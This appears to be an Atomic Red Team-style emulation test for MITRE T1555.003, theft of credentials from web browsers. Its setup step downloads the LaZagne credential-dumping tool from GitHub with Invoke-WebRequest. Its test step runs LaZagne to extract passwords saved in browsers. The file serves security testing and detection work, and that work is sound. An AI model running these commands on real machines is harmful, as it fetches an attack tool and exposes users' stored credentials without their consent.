#TechniqueName: Credentials from Password Stores: Credentials from Web Browsers
#AtomicTestName: LaZagne - Credentials from Browser
#Language: cmd

#get_prereq_commands
New-Item -Type Directory (split-path PathToAtomicsFolder\T1555.003\bin\LaZagne.exe) -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/AlessandroZ/LaZagne/releases/download/2.4.3/lazagne.exe" -OutFile "PathToAtomicsFolder\T1555.003\bin\LaZagne.exe"


#prereq_commands
if (Test-Path PathToAtomicsFolder\T1555.003\bin\LaZagne.exe) {exit 0} else {exit 1}


#commands
PathToAtomicsFolder\T1555.003\bin\LaZagne.exe browsers

